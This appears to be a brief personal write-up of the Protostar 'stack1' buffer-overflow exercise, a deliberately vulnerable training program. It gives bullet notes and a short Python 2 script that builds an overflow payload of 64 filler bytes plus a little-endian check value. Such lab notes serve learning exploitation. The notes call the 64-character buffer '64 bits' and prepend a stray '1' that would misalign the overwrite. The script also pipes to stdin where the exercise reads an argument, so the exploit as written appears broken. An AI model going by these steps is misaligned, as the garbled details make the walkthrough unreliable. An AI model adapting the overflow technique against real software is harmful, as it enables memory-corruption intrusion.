Protostar Stack1


easy buffer overflow

  • compare statement in assembly for 1
    • payload needs to start with 1
  • buffsize found to be 64 bits
    • filler 64 characters long: 'a'*64
  • hard coded canary as "0x61626364"
    • little endian: 'dcba' final payload
python exploit1.py | ./stack1  
bufferSize = 64;  
filler = 'a' * bufferSize

firstCompare = '1'  
secondCompare = 'abcd'  
print firstCompare +  filler + secondCompare  
Press ` to check out my sick terminal!